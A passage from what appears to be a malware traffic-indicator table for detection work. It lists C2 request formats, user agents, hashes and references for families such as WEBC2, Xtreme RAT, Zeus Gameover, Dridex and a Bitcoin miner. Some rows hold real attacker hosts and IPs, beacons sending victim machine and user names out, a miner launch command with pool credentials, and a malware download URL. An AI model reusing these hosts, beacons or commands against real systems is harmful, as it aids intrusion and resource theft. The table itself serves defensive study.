| http://intelreport.mandiant.com/ | http://bit.ly/crimepcaps | 2012-04 | ||||
263 | 2013-04-28 | APT | Tarsip Moon | GET | /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230 | /2055?meth=gc&tid= | UA-CPU: x86 Accept: text/html;q=0.9,text/plain;q=0.8,application/xhtml+xml;q=0.7,image/gif;q=0.5,/;q=0.1 Accept-Language: en-us Accept-Encoding: gzip;q=0.8, deflate;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Host: <hostname> | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) | The malware sends an initial beacon HTTPrequest (SSL encrypted) to /images/icons/<rand_1000_5999> where the URL parameter “inif” contains a single-byte XOR’d string that is Base64 encoded. | 95f25d3afc5370f5d9fd8e65c17d3599 | http://intelreport.mandiant.com/ | 2011-10 | |||||
264 | 2013-04-28 | CRIME | Tbot tor | n | ...........P.......+.l.....U..w_..?z5.U.!....:. ...9.8.....5.........3.2............./......... ..... .....Y.........www.fjpv.com......... .4.2................... ..... .........................#. | FC7C3E087789824F34A9309DA2388CE5 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | ||||||||||
265 | 2013-04-28 | CRIME | Tinba aka Zusy | POST | /h/index.php | /index.php | Host: dakotavolandos.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: identity Connection: close Content-Type: application/octet-stream Content-Length: 13 y0J.......ii.HTTP/1.1 200 OK -- see the link | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | c141be7ef8a49c2e8bda5e4a856386ac | http://contagiodump.blogspot.com/2012/06/amazon.html | http://bit.ly/crimepcaps | 2012-06 | |||||
266 | 2013-04-28 | APT | Vinself | POST | /w880/T19R17Q16/12010L11014 | Accept: image/gif, image/x—xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Accept—Language: zh—zh Content-Type: application/octet—stream Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible;MSIE 6.0; windows NT 5.1) Host: ftp.[remived].com Content-Length: 90 connection: Keep-Al ive Cache-control: no-—cache' GIF89aP. . .m.w. u. p. a.3.3.i.i6U:X0Q< | Mozilla/4.0 (compatible;MSIE 6.0; windows NT 5.1) | is randomly generated using system time - see the article | http://www.fireeye.com/blog/technical/malware-research/2010/11/winself-a-new-backdoor-in-town.html | 2010-11 | |||||||
267 | 2013-04-28 | CRIME | Vobfus | GET | /XEuPCLrf?e | /XEuPCLrf?e | /XEuPCLrf?e User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) Host: 82747.ddnsd.at | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) | s70F0B7BD55B91DE26F9ED6F1EF86B456 | http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html | 2012-11 | ||||||
268 | 2013-04-28 | APT | WEBC2-Bolid | GET | /firefox.html | /firefox.html | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: <hostname> Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | in response, the C2 server sends encoded commands between <head> and </head> HTML tags. The encoded commands are XORed with 0x42 and then Base64 encoded. | 5ff3269faca4a67d1a4c537154aaad4b | http://intelreport.mandiant.com/ | 2012:03:00 | |||||
269 | 2013-04-28 | APT | WEBC2-Clover | GET | /Default.asp | /Default.asp | Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Win32) Host: 209.161.249.125 Connection: Keep-Alive Cookie: PREF=86845632017245 | Mozilla/4.0 (compatible; MSIE 7.0; Win32) Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) When instructed to download a file, the malware will us the following User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.012 | The malware will make will periodically make HTTP requests with the following URIs: o /Default.asp /index.html | 2fccaa39533de02490b1c6395878dd79 | http://intelreport.mandiant.com/ | 2011:10:00 | |||||
270 | 2013-04-28 | APT | WEBC2-CSON | GET | /Default.aspx?INDEX=<10_random_characters> | /Default.aspx?INDEX= | User-Agent: Win32 Host: 66.129.222.1 Connection: Keep-Alive | <HOSTNAME> When instructed to download a file, the malware will us the following User-Agent: Windows+NT+5.1 | 50f35b7c86aede891a72fcb85f06b0b7 | http://intelreport.mandiant.com/ | 2011:09:00 | ||||||
271 | 2013-04-28 | APT | WEBC2-CSON Response to commands | POST | /Default.aspx?ID=IMNQRSSRXK | /Default.aspx?ID= | Accept: text/ Content-Type: application/x-www-form-urlencoded User-Agent: Win32 Host: 70.62.232.98 Content-Length: 16 Cache-Control: no-cache pn9OrT8wrT9Apn8= | o Win32 o <HOSTNAME> When instructed to download a file, the malware will us the following User-Agent: o Windows+NT+5.1 | Responses to commands (except "d") usePOSTs to "/Default.aspx?ID=<10_random_uppercase>" | 50f35b7c86aede891a72fcb85f06b0b7 | http://intelreport.mandiant.com/ | 2011:09:00 | |||||
272 | 2013-04-28 | APT | WEBC2-HEAD | GET | / | / | / User-Agent: WinHTTP 1.0 Host: www.olmusic100.com Content-Length: 28 Connection: Keep-Alive Y29ubmVjdCBURVNUTUFDSElORQ== | WinHTTP 1.0 | WEBC2-HEAD first issues an HTTPto the host, sending the Base64-encoded string of “connect <HostName>”, where <HostName> is the name of the compromised machine running the malware. A sample decryptedrequest is shown in Figure 40, where the HTTP body is the Base64 encoded string “connect TESTMACHINE” (all over SSL 443) | 649d54bc9eef5a60a4b9d8b889fee139 | http://intelreport.mandiant.com/ | 2010:02:00 | |||||
273 | 2013-04-28 | APT | WEBC2-Table | GET | /order.htm | /order.htm | User-Agent: <current_time>+<hostname> Host: meeting.toh.info Connection: Keep-Alive Cache-Control: no-cache The malware uses the following User-Agent string: o <current_time>+<hostname> | <current_time>+<hostname> | 7a7a46e8fbc25a624d58e897dee04ffa | http://intelreport.mandiant.com/ | 2012:03:00 | ||||||
274 | 2013-04-28 | CRIME | Xpaj | POST | /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh | /DxODlv? | Host: nortiniolosto.com Content-Length: 1279 Accept-Encoding: deflate Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Pragma: no-cache Cache-Control: no-cache nortiniolosto.com | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | D5C12FCFEEBBE63F74026601CD7F39B2 | http://contagiodump.blogspot.com/2012/05/mbr-rootkit-xpaj-sample.html | http://bit.ly/crimepcaps | 2012-05 | |||||
275 | 2013-04-28 | APT | Xtreme Rat | GET | /1234567890.functions | .functions | Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: shittway.zapto.org:336 Connection: Keep-Alive Cache-Control: no-cache S.T.A.R.T.S.E.R.V.E.R.B.U.F.F.E.R..fm.......A.(.d,_.. .,T..N...............q> | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; . NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 336 | DAEBFDED736903D234214ED4821EAF99 | http://bit.ly/aptpcaps | 2013-04 | |||||
276 | 2013-04-28 | APT | Xtreme Rat | GET | /1234567890.functions | .functions | Accept:/Accept-Encoding:gzip,deflate User-Agent:Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;Trident/ 4.0;.NETCLR1.1.4322;.NETCLR2.0.50727;.NETCLR3.0.4506.2152;.NETCLR3.5.30729;. NET4.0C) Host:172.16.1.1:4000 Connection:Keep-Alive | Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;Trident/ 4.0;.NETCLR1.1.4322;.NETCLR2.0.50727;. NETCLR3.0.4506.2152;.NETCLR3.5.30729;. NET4.0C) | 4000 | http://bit.ly/aptpcaps | 2012 | ||||||
277 | 2013-04-28 | CRIME | Zeus Gameover | GET | /search.php?page=73a07bcb51f4be71 | /search.php?page= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) Host: telecrop.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2012-02 | ||||||
278 | 2012-08-08 | CRIME | BitcoinMiner | POST | {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]} | {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]} {"error": null, "id": 1, "result": [["mining.notify", "ae6812eb4cd7735a302a8a9dd95cf71f"], "f80e8a14", 4]} {"params": [63], "id": null, "method": "mining.set_difficulty"} {"params": ["8de", "72216db0a2e9151d8b8172470729848cbeecf1080cb8f37f65d047efb2c749f3", "01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2303122606062f503253482f04a5c4035208", "092f7374726174756d2f000000000100fb422a010000001976a9143c5adb00f1457309f084675941f114b8c09b6af188ac00000000", ["fc25ce83ea8ce3200ed2f56e7cf1ec43a8837118ddd965759c8fbe4d12a04f82", "ee78512684f4bb06bcbed1aa01703e10bbb733dc16cccaf387df0b18f656f234"], "00000001", "1b4e2a39", "5203c4a4", true], "id": null, "method": "mining.notify"} {"id": 2, "method": "mining.authorize", "params": ["hitmanuk.4", "123"]} | none in request but file strings: User-Agent: suckergo/2.3.2 | 9000 | downloaded by Bitblazer . Part of a tool package including bat file with "system.exe --algo scrypt --s 6 --threads 4 --url stratum+tcp://mine.pool-x.eu:9000 --userpass hitmanuk.4:123 P | e2c655db1ccd3a632ded94eacb933643 = part of f865c199024105a2ffdf5fa98f391d74 dropper - downloaded by Blazebot DBAF6F1D0EAAB5DC0C88B9CEEC9EA95E | http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/bitcoinminer-strings-CRIME.html | 8/8/2012 | ||
279 | 2012-08-08 | CRIME | Blazebot | IRC | <p>NICK USA|94576 <p>USER vtptdwd 0 0 :USA|94576 | NICK USA|94576 USER vtptdwd 0 0 :USA|94576 :DIE.Blazed-IRC.com NOTICE AUTH :*** Looking up your hostname... :DIE.Blazed-IRC.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead :DIE.Blazed-IRC.com NOTICE USA|94576 :*** If you are having problems connecting due to ping timeouts, please type /quote pong 5FC26DC1 or /raw pong 5FC26DC1 now. PING :5FC26DC1 PONG :5FC26DC1 JOIN #fkyou# stay0ut :DIE.Blazed-IRC.com 001 USA|94576 :Welcome to the Blazed-IRC IRC Network USA|94576!vtptdwd@[victimIp] | 6667 | IRC | http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot | http://bit.ly/crimesamples | 8/8/2012 | ||||||
280 | 2015-01-22 | CRIME | Nurjax Adware | GET | /services/rules.txt?dummy=916 | /rules.txt?dummy= | 80 | http://www.symantec.com/security_response/writeup.jsp?docid=2014-121000-1027-99&tabid=2 | |||||||||
281 | 2015-01-22 | CRIME | Tosct | GET | Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV | Y3vaR7-V0Vj6gdni | 8000 | BDD2AD4C0E1E5667D117810AE9E36C4B | http://www.threatexpert.com/report.aspx?md5=bdd2ad4c0e1e5667d117810ae9e36c4b <p> http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor:Win32/Tosct.A#tab=2 | ||||||||
282 | 2015-01-22 | CRIME | Nocpos | GET <p> POST | <p>/check/echo <p>/check | /check | POST /check HTTP/1.1 User-Agent: something Content-Type: application/x-www-form-urlencoded Host: support.wordpress-dark.com Content-Length: 35 Cache-Control: no-cache Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175 address=08-00-27-68-68-B9&dt1=&dt2= | something | 80 | http://virustotal.com/en/file/09ca7be86f517f2e3238e1d52115d29fb2dd079a4d9fc60c18ddc823c137a940/analysis/ | |||||||
283 | 2015-01-22 | CRIME | OnionDuke | GET | <p>/forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg= <p>s/sysinfo_7.php <p>/forum/phpBB3/prx_26.php | /phpBB3/ <p> /sysinfo_7.php | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rombeast.site50.net Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 80 | 28f96a57fa5ff663926e9bad51a1d0cb | https://www.f-secure.com/v-descs/backdoor_w32_onionduke.shtml | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | ||||
284 | 2015-01-22 | APT | Lagulon (Operation Cleaver) | POST | <P>/contador/server.php <P>/i/server.php <P>/includes/server.php | /server.php | POST /contador/server.php HTTP/1.1 Content-Disposition: inline; comp=<PC-NAME>; account=<USERNAME>; product=3; User-Agent: Mozilla/5.0 Host: halon.com.br Content-Length: 0 Cache-Control: no-cache | Mozilla/5.0 | 80 | https://www.virustotal.com/en/file/e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53/analysis/ <p> http://telussecuritylabs.com/threats/show/TSL20141210-04 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | |||||
285 | 2015-01-22 | APT? | Medusa | POST | <p>%s/bbc_mirror/%s/search?id=%s <p>/CNN_Mirror/EN/%s/search?id=%s <p>|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00 | _mirror/%s/search?id= | f8f74f17af1e3069bf780824ba26b33f <p> 3c0a2d353461c32a5f34e931e9aba71d | http://totalhash.com/analysis/820ea0a145f7c9ee7fa99176c5d59d5f20ada310 | http://bit.ly/aptsamples | ||||||||
286 | 2015-01-22 | CRIME | Toopu | GET | <p>/toopu.png <p>/%s:1048%s <p>/num3.html <p>/web/get_ad3.asp?type=loadall&machinename= <MACHINE_NAME>-6C78A9C3&cr=yes <p>/num3_51la.asp | /toopu.png | GET /toopu.png HTTP/1.1 Accept: */* Referer: Accept-Language: zh-cn UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215) Host: 174.128.244.58 Connection: Keep-Alive Cookie: | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215) | 808 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||||
287 | 2015-01-22 | CRIME | Twerkin | GET | <p>/classes/functions.php?functionname=online <p>/classes/functions.php?functionname=getupdates <p>/classes/functions.php?functionname=getcommand | /classes/functions.php?functionname= | Host: nettwerk.x10.mx Connection: Keep-Alive | 80 | a27721f3b9566601030daab58c092c14 | http://telussecuritylabs.com/threats/show/TSL20141231-03 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | |||||
288 | 2015-01-22 | CRIME | TzeeBot / TinyZBot | POST | /checkupdate.asmx | /checkupdate.asmx | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433) Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/GetServerTime" Host: 95.211.241.249 Content-Length: 291 Expect: 100-continue Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433) | 96e372dea573714d34e394550059b1d7 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||||
289 | 2015-01-23 | CRIME | XLS URLDownload ToFileA function for Dridex | GET | /koh/mui.php | /mui.php | 8080 | hxxp://95.163.121.82:8080/koh/mui.php, C:\DOCUME~1\admin\LOCALS~1\Temp\GYHjksdf.exe Tax Payment Issue Email | 34fa02bb258c93cdf17cb49f25bc0866 | ||||||||
290 | 2015-01-23 | CRIME | Quervar / Induc.C / Dorifel | GET | <p>/js/way.php?00021708&pin=7DF38AD66C78A9C3 <p>/404/way.php?00038F50&pin=7DF38AD66C78A9C3 <p>/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3 <p>/1.php?JXU9WXFG&pin=DEC09603F4CEFD80 | &pin= | GET /1.php?JXU9WXFG&pin=DEC09603F4CEFD80 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MASP) Host: greatnewidea1.ru Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 52466 | File infector | 2b62b641bcb2aebef64632cbf0dd37cf | http://www.welivesecurity.com/2012/08/21/quervar-induc-c-reincarnate/ <p> http://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/115/the-significance-of-quervar <p> https://www.virustotal.com/en/file/98370c3710c7c4fc8a50b0804c00a9a27d5f93e166a4aa739073febdf894a879/analysis/ | |||||
291 | 2015-01-23 | CRIME | Feidowns downloader / Kilim (?) / Cracktools | GET | <p>yeniadmin.php?os=WindowsXP <p>/yeniadmin.php?os=Windows7&osbit=64&antiv <p>/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI http://whos.amung.us/pingjs/?k=yenikazi | .php?os= <p>&kart=KotuKart&core | GET /yeniadmin.php?os=WindowsXP&osbit=32&antiv=Nonti&kart=KotuKart&core=1&mhz=HIZLI HTTP/1.1 User-Agent: Access Host: feidowns.com | Access | 80 | https://www.virustotal.com/en/domain/feidowns.org/information/ | 2b62b641bcb2aebef64632cbf0dd37cf | ||||||
292 | 2015-01-23 | CRIME | GameVance Adware | GET | /aj/updtah.php | /updtah.php | 80 | 1e78fe18d2e2077ae991a9e4e93d2a7c | https://malwr.com/analysis/N2MzNzdhODJhZWIxNGRmNTk5ZmUwMTUzZWE0OWI1Mjc/ | ||||||||
293 | 2015-01-23 | CRIME | OpenShopper Adware | GET | <p>//mmsv/Access3.php <p>//opendb/mmsv.php <p>//mmsv/Access2.php <p>/opapp/postmedia1/Update.dat <p>/opapp/postmedia1/OKUpdate.exe | mmsv <p> opapp | 80 | 38F2EFA2D40FF3ACF0C57CB4B59A250E | http://www.threatexpert.com/report.aspx?md5=38f2efa2d40ff3acf0c57cb4b59a250e | ||||||||
294 | 2015-01-23 | CRIME | SoftPulse Adware | GET | /c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D | 80 | c04017a08f3e4cebd9b7b20308ee8257 | ||||||||||
295 | 2015-01-23 | CRIME | FakeAV | GET | <p>/[...]/load.php?file=uploader <p>/[...]/load.php?file=grabbers <p>/[…]/load.php?file=1 <p>/ohwgx3kiTh/document.doc <p>/ohwgx3kiTh/load.php?file=0 | load.php?file= | 80 | https://www.f-secure.com/v-descs/trojan-downloader_w32_kdv176347.shtml | |||||||||
296 | 2015-01-23 | CRIME | Wauchos (download by Zbot of Cridex) | POST | <p>/ssdc32716372/file.php <p>/auto*.it/*/jeve.exe <p>//dd*.ru/old.exe | /ssdc32716372/file.php | POST /ssdc32716372/file.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022 Host: 188.225.72.229 Content-Length: 128 Connection: Keep-Alive Cache-Control: no-cache .(c...<..T3..DE._..p.[..f12...j.P.....i...G.,(....Y5y...........s..,..,u...n0...].S.....n._X$...E.3Y.Z8.....hY.xJ..*..WN.FNE.V. | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022 | 80 | 0d8d7a8074ee36a626d086f02490aaab | https://www.f-secure.com/weblog/archives/00002759.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||
297 | 2015-01-23 | CRIME | Blackenergy DDos Bot | POST | <p>id=[bot_id]&bid=[base64_encoded_build_ id]&dv=[x]&mv=[y]&dpv=[z] <p>id=[bot_id_sha1]&bid=[base64_encoded_build_ id]&nm=[x]&cn=[y]&num=[z] The only major difference is that the id field contain just the hash instead of the actual string | https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf | https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf | http://bit.ly/crimesamples | |||||||||
298 | 2015-01-28 | CRIME | Alurewo / Alureon pay per click | GET | /click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5 | /click.php?c= | GET /click.php?c=f39daf0d969abd8fe186a9656341ed05a43d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7f11fa545f5e2926f54123019882b9a3fc4a6a6b711ae23b8587d1f45d7324667bb5f3e447f05b43c5 HTTP/1.1 Accept: */* Referer: http://retravopoytem.com/search.php Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 184.164.143.90 Connection: Keep-Alive | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; | 80 | http://www.malware-traffic-analysis.net/2014/06/24/index2.html | |||||||
299 | 2015-01-29 | CRIME | OSX Wirelurker | GET | mac/getversion.php?sn=<SN> | /getversion.php?sn= | GET /mac/getversion.php?sn=C02N9LBSG083 HTTP/1.1 Host: www.comeinbaby.com Accept-Language: zh-Hans, en, en-us User-Agent: globalupdate (unknown version) CFNetwork/720.2.4 Darwin/14.1.0 (x86_64) Connection: keep-alive | globalupdate (unknown version) CFNetwork/720.2.4 Darwin/14.1.0 (x86_64) | 80 | www.virustotal.com/en/file/93856f704db2efe2e2262e6c710a23d03d6b0748c02e4d5d8d2d4e25f56a8b32/analysis/ | http://bit.ly/crimesamples | ||||||
300 | 2015-01-29 | CRIME | Systweak Adware - Systweak RegClean Pro & Advanced System Protector | GET | /getipaddress.asp | /getipaddress.asp | GET /getipaddress.asp HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: www.k9pcfixer.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) | 80 | 0ae593e18649d696ed578e792b75558d | https://www.virustotal.com/en/file/82fc51cbdee9cf104af95a94415ff48190f55dc9ddf2de003753cbac099d392c/analysis/ | ||||||
301 | 2015-01-29 | CRIME | MPlug / Multiplug Adware | GET | /?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0& page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7 371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436 02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E +L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd% 2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+ -+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_ redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo ut_id= 8&project_name=TusFiles&uuid=%252A | /?step_id=1&sf=1& | GET /?step_id=1&sf=1&installer_id=8605008392702878770&publisher_id=2356&source_id=0&page_id=0&affili ate_id=0&country_code=US&locale=EN&browser_id=4&download_id=7371188128136903471&external_id=0&ins taller_type=IX_2013&hardware_id=15979643602580996082&session_id=17077067485576374638&installer_fi le_name=Doctorow%2C+E+L+-+3+books+.rar&filesize=4.5+MB&product_name=TusFiles&product_title=Doctor ow%2C+E+L+-+3+books+.rar&product_download_url=http%3A%2F%2Fk.tusfiles.net%2Fd%2F74la37ldtz2fvxijo t2ypuiocogpoue4j7hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+-+3+books+.rar&product_file_name=Doctor ow%2C+E+L+-+3+books+.rar&project_encode_id=2356&ttl=1422295723363&isRedirected=1&enc_u_p=1&st=0&I X_Startapp=1&self_redirect=0&st=0&reffer=http%3A%2F%2Ftusfiles.net%2F&for_html_installer=1&layout _id=8&project_name=TusFiles&uuid=%252A HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.91 2.75 Safari/535.7 Host: c1.diriginal.org Cache-Control: no-cache | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.91 2.75 Safari/535.7 | 80 | 2ea0bcb1ca764a01571a09208e892199 | https://www.virustotal.com/en/file/d0a87d7b635d2313c1b4011e38c70e3c080bdf08be4d7a36344119d2c6e84ee6/analysis/ | ||||||
302 | 2015-01-29 | CRIME | Nemucod JS | GET | /document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939 1 | /document.php?id= | GET /document.php?id=5451565E011705000B120124031309050D084A0313114A010011&rnd=2129391 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 64.239.7.212 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 80 | e77334c5995614fc79f285abca8e14ad | https://www.virustotal.com/en/file/6ead063f36bf906ff05055db42c9d7c6acc7d9729179286d8c9b30d52e815def/analysis/1422638297/ | http://bit.ly/crimesamples | |||||
